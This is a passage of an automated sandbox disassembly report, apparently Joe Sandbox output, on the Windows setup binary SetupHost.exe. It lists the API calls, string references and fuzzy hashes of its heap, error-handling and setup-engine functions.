                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,?,?,?,00A01567,23FAFFD7,00000000,0052B3E8,?,00A1103B,000000FF,?,00A01659,?,23FAFFD7), ref: 00A013E5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                • String ID: <unnamed>$CBlackboard::Close$CBlackboard::Close: %s.$onecore\base\ntsetup\panther\engine\bb.cpp
                                                                                                                                                                                                                • API String ID: 1452528299-3470024171
                                                                                                                                                                                                                • Opcode ID: 8d67364f1ce44e37dbeeee70fc95d01f7c465eca5de28aaef5e8942ba13daf4a
                                                                                                                                                                                                                • Instruction ID: 8ca847bb6c4a5e010a5c4e9758469bf88d8c19dfe756ebc7c9ca92c0fc6921f0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d67364f1ce44e37dbeeee70fc95d01f7c465eca5de28aaef5e8942ba13daf4a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2501F4B27407087BDF301BD56C86EBB72EDDBC0B55B04413DBA59566D0DA72AC0186A1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • RtlDuplicateLUtf8String, xrefs: 009DA815
                                                                                                                                                                                                                • onecore\base\lstring\lutf8_string.cpp, xrefs: 009DA80A
                                                                                                                                                                                                                • Not-null check failed: Destination, xrefs: 009DA7FE
                                                                                                                                                                                                                • RtlIsLUtf8StringValid(Source), xrefs: 009DA7C8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: Not-null check failed: Destination$RtlDuplicateLUtf8String$RtlIsLUtf8StringValid(Source)$onecore\base\lstring\lutf8_string.cpp
                                                                                                                                                                                                                • API String ID: 3510742995-2098319663
                                                                                                                                                                                                                • Opcode ID: 485830b8fd4f2348cd48110b9afb2c8bc3d862716d8cccfd2c0c01f6013ed629
                                                                                                                                                                                                                • Instruction ID: f4b6b9e30466bbc6fcfe80634e3b5035db78b87402a29f77972e7e66f3922b7c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 485830b8fd4f2348cd48110b9afb2c8bc3d862716d8cccfd2c0c01f6013ed629
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1801D2B1D00714DBCB109F99880465BBBF4EF80714B21C46AD845AB301D77199459BA1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: GetLastError.KERNEL32(?,00000000,00000000,?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE660
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: GetLastError.KERNEL32(?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE676
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: _wcsnicmp.MSVCRT ref: 009BE6C3
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: _wcsnicmp.MSVCRT ref: 009BE6DB
                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,009BFDEC,00000000,00000000,00000000), ref: 009BFBF3
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,009BFDEC,00000000,00000000,00000000), ref: 009BFBFB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,009BFDEC,00000000,00000000,00000000), ref: 009BFC29
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009BFDEC), ref: 009BFC30
                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,009BFDEC,00000000,00000000,00000000), ref: 009BFC39
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Heap_wcsnicmp$AttributesFileFreeProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 686246089-0
                                                                                                                                                                                                                • Opcode ID: b4a77ea418b98934108cd2fc9dfa94da9114f255c8d9e3e7f269152a7dd1fdf6
                                                                                                                                                                                                                • Instruction ID: b24b0fa01d4f7e2c68babc1ffdb15d1798a3d01f7dc685b2e5f6bcc14cb166ef
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4a77ea418b98934108cd2fc9dfa94da9114f255c8d9e3e7f269152a7dd1fdf6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43F0D132A04314AFD7049BFA9D4CAEFBEB8EB84371B104638F815D32A0EA70CD438650
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00A00FF3: GetProcessHeap.KERNEL32(00000008,00000000,02000000,00000000,?,00A00811,02000000,65000000,00000000,?,?,00A00A23,?), ref: 00A0100C
                                                                                                                                                                                                                  • Part of subcall function 00A00FF3: HeapAlloc.KERNEL32(00000000,?,00A00A23,?), ref: 00A01013
                                                                                                                                                                                                                  • Part of subcall function 00A00591: GetProcessHeap.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,00A00A23,?), ref: 00A005A7
                                                                                                                                                                                                                  • Part of subcall function 00A00591: HeapAlloc.KERNEL32(00000000,?,00A00A23,?), ref: 00A005AE
                                                                                                                                                                                                                  • Part of subcall function 00A00591: GetProcessHeap.KERNEL32(00000000,00000000,00000011,?,00A00A23,?), ref: 00A005BA
                                                                                                                                                                                                                  • Part of subcall function 00A00591: HeapReAlloc.KERNEL32(00000000,?,00A00A23,?), ref: 00A005C1
                                                                                                                                                                                                                  • Part of subcall function 00A00591: strrchr.MSVCRT ref: 00A005E7
                                                                                                                                                                                                                  • Part of subcall function 00A00591: GetProcessHeap.KERNEL32(00000000,?,?,?,00A00A23,?), ref: 00A00613
                                                                                                                                                                                                                  • Part of subcall function 00A00591: HeapReAlloc.KERNEL32(00000000,?,00A00A23,?), ref: 00A0061A
                                                                                                                                                                                                                  • Part of subcall function 00A00591: GetProcessHeap.KERNEL32(00000000,00000000,?,?,00A00A23,?), ref: 00A00654
                                                                                                                                                                                                                  • Part of subcall function 00A00591: HeapReAlloc.KERNEL32(00000000,?,00A00A23,?), ref: 00A0065B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,02000000,65000000,00000000,?,?,00A00A23,?), ref: 00A00837
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00A00A23), ref: 00A0083E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00A00A23,?), ref: 00A00846
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00A00A23), ref: 00A0084D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00A00A23,?), ref: 00A00855
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00A00A23), ref: 00A0085C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$Free$strrchr
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2728736496-0
                                                                                                                                                                                                                • Opcode ID: e1467b7abce0a5178e4a6e629a41bcdde815b58794d8bdc57335a7505ba44f53
                                                                                                                                                                                                                • Instruction ID: dbc8e5a22324e607b919a180d9ff59c51c9edaf4710d6f72a5227474bf82ba44
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1467b7abce0a5178e4a6e629a41bcdde815b58794d8bdc57335a7505ba44f53
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FF06272A04214BBC710E7F9AD8CDBF7EBDEED97A17048059F509C3250CA748D0297A0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WinHttpCloseHandle.WINHTTP(?,00000004,00000000,009BA6AB,?,00000000,009BA11D,?,?,00000000,009AB0E2), ref: 00A088D5
                                                                                                                                                                                                                • WinHttpCloseHandle.WINHTTP(?,00000004,00000000,009BA6AB,?,00000000,009BA11D,?,?,00000000,009AB0E2), ref: 00A088E6
                                                                                                                                                                                                                • WinHttpCloseHandle.WINHTTP(00000000,00000004,00000000,009BA6AB,?,00000000,009BA11D,?,?,00000000,009AB0E2), ref: 00A088F5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000004,00000000,009BA6AB,?,00000000,009BA11D,?,?,00000000,009AB0E2), ref: 00A08906
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?), ref: 00A0890D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseHandleHttp$Heap$FreeProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 715821489-0
                                                                                                                                                                                                                • Opcode ID: 5d1060cb014b40d2f4068e93489b4a6f9ccb3faef642a653494b714bd86d9ef1
                                                                                                                                                                                                                • Instruction ID: 0781425b58b7320d7918db27ed1b00f3557d78ea6d42c7a794c334de7c9fa4e9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d1060cb014b40d2f4068e93489b4a6f9ccb3faef642a653494b714bd86d9ef1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D012835401B05CFC3329F24E9048AABBF5FF84741720892DE0EA425A4CF3A6456DB44
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,009E6DD1,?,00000000,00000000,009E6E66,00000000,00000000,00000090,009DE0C5,?,00000000,00000000), ref: 009E70C2
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009E70C9
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,009E6DD1,?,00000000,00000000,009E6E66,00000000,00000000,00000090,009DE0C5,?,00000000,00000000), ref: 009E70DE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009E70E5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,009E6DD1,?,00000000,00000000,009E6E66,00000000,00000000,00000090,009DE0C5,?,00000000,00000000), ref: 009E70F4
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009E70FB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3859560861-0
                                                                                                                                                                                                                • Opcode ID: 80a0dca546015f3be6adf8ef0f77d869794f3db1739e2ee2796ed682e3fb094c
                                                                                                                                                                                                                • Instruction ID: 4544f8462dacfc1793537bde87e61599e83baf277c1c8c512796fe03ef63f2f5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80a0dca546015f3be6adf8ef0f77d869794f3db1739e2ee2796ed682e3fb094c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05F0DA31508752ABC7329FE6EC0C9AFBABCBF85792314985DB59981020CB358843DB61
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00A07796), ref: 00A077C9
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A077D0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00A07796), ref: 00A077DF
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A077E6
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00A07796), ref: 00A077F5
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A077FC
                                                                                                                                                                                                                  • Part of subcall function 00A07311: memset.MSVCRT ref: 00A07345
                                                                                                                                                                                                                  • Part of subcall function 00A07311: GetProcessHeap.KERNEL32(00000000,?,00000000,?,?,00000000,?,00A073C1,00000000,?,?,?,00A07297), ref: 00A07366
                                                                                                                                                                                                                  • Part of subcall function 00A07311: HeapFree.KERNEL32(00000000,?,?), ref: 00A0736D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess$memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 145835812-0
                                                                                                                                                                                                                • Opcode ID: 77a4e5682700c49b75a1b8e2d2a7169507015a616aebc4caf3a7d1d7886c370e
                                                                                                                                                                                                                • Instruction ID: 6d030cfb58cc768db42822c5b3aed6f0a32e66fa8f500723c871ea7957d1556e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77a4e5682700c49b75a1b8e2d2a7169507015a616aebc4caf3a7d1d7886c370e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85F04C71E08209ABDF11DBE1AD8CEFF3ABCAA587C17049458F905E6190DB34EC02D671
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000000,00000000,?,?,009E57B2,00A124C8,00000018,009ECF33,?,?,00000000,?,?,009E6ACD,?,?), ref: 009E57D9
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,009E57B2,00A124C8,00000018,009ECF33,?,?,00000000,?,?,009E6ACD,?,?,?), ref: 009E57E2
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009E57B2), ref: 009E57E9
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,009E57B2,00A124C8,00000018,009ECF33,?,?,00000000,?,?,009E6ACD,?), ref: 009E57F2
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009E57B2), ref: 009E57F9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess$DeleteFile
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1808516021-0
                                                                                                                                                                                                                • Opcode ID: bf6699eb9443146b448bd504c68b88e310bc286751cb79c6bd2cc2bcb6a0d0ab
                                                                                                                                                                                                                • Instruction ID: a7076fbab44e4b68cc8d39d7b8a23c6624a79fd99cd5d680b4b8cbc22d32ab77
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf6699eb9443146b448bd504c68b88e310bc286751cb79c6bd2cc2bcb6a0d0ab
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CE06D32508711ABD3219BD6EC8CBAF7A7CABD9B66F169059F60993150CA714C0286A0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ResetEvent.KERNEL32(?,?,?,00000000,?,?,009ED6AA,?,009ED0B0,009ECFA0,Function_0006CEF0,00000000,00000000,?,009E6A3B,?), ref: 009ED773
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,009ED6AA,?,009ED0B0,009ECFA0,Function_0006CEF0,00000000,00000000,?,009E6A3B,?,?,?,?,00000000,00000000), ref: 009ED77D
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,009ED6AA,?,009ED0B0,009ECFA0,Function_0006CEF0,00000000,00000000,?,009E6A3B,?,?,?,?,00000000,00000000), ref: 009ED793
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: GetLastError.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB6D8
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: GetCurrentThreadId.KERNEL32(?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB6EC
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: RtlAcquireResourceShared.NTDLL ref: 009EB6FC
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: RtlReleaseResource.NTDLL(00A16750), ref: 009EB728
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: SetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB766
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB773
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: HeapFree.KERNEL32(00000000), ref: 009EB77A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$HeapResource$AcquireCurrentEventFreeProcessReleaseResetSharedThread
                                                                                                                                                                                                                • String ID: WimImageEnqueueOperation
                                                                                                                                                                                                                • API String ID: 3009057237-1395525401
                                                                                                                                                                                                                • Opcode ID: 5e7e67ae42c9abd17be70657c21de2616d37f3c15f0bbda8e10327e9e25d87e1
                                                                                                                                                                                                                • Instruction ID: 3805302182ff058a95ab25d864474914487be1253d5650e36beb0c15c86398d7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e7e67ae42c9abd17be70657c21de2616d37f3c15f0bbda8e10327e9e25d87e1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B531F5B1B027A297DB139BABC884B6F76A9AFC5760F144525EC01D7390DB71CC028AD1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RtlRaiseStatus.NTDLL(C00000E5,00000000,00000328,00001B30,?,00000005,?,?,00000000,?,?), ref: 009D54BA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • NewComment = this->AllocateStreamObject(), xrefs: 009D54E9
                                                                                                                                                                                                                • CMicrodomBuilder::ConsumeComment, xrefs: 009D54DB
                                                                                                                                                                                                                • onecore\base\xml\udom_builder.cpp, xrefs: 009D54D0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: RaiseStatus
                                                                                                                                                                                                                • String ID: CMicrodomBuilder::ConsumeComment$NewComment = this->AllocateStreamObject()$onecore\base\xml\udom_builder.cpp
                                                                                                                                                                                                                • API String ID: 3012540672-3669548485
                                                                                                                                                                                                                • Opcode ID: e2345267b6345701f14d425fa00f18025a9018a5eb1edf88c2695054972a177f
                                                                                                                                                                                                                • Instruction ID: 22c901f162a6a6f3b171dfca63244cd4513d8b3665fb1548a80cf6e5b2f7ed3b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2345267b6345701f14d425fa00f18025a9018a5eb1edf88c2695054972a177f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97319A70540601DFC725DF68D484A9ABBF8FF48314F15C66EE9199B351EB30A942CBA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                                                • String ID: %s;%s=%s$%s=%s$CMoSetupOneSettingsHelperT<class CEmptyType>::AddSettingsStringParameter
                                                                                                                                                                                                                • API String ID: 431132790-3773918688
                                                                                                                                                                                                                • Opcode ID: 6ce147c8243841da98ef6c1477a62905cc948c9c19caf2f7ab70de061026a2fb
                                                                                                                                                                                                                • Instruction ID: 28be4b9727b2ab07719db6bcc489a2cd3a2119afa5f95c83614c0db1396e1912
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ce147c8243841da98ef6c1477a62905cc948c9c19caf2f7ab70de061026a2fb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF21C471740215ABCF15AE90CA62FFA3667ABC4720F14C425FA189F395DAB8DA40C791
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: towlower$wcsrchr
                                                                                                                                                                                                                • String ID: C:\$Windows.~WS\Sources\SetupHost.Exe
                                                                                                                                                                                                                • API String ID: 1922847176-3808150863
                                                                                                                                                                                                                • Opcode ID: 66c7528100bf33451a26e830002a66b22d8157d7d8662fdd5c38913f55d6f9fb
                                                                                                                                                                                                                • Instruction ID: da3fb154adf7669d533b7db75b96c9b0e05777771f577c3142f15ecdcd11afef
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66c7528100bf33451a26e830002a66b22d8157d7d8662fdd5c38913f55d6f9fb
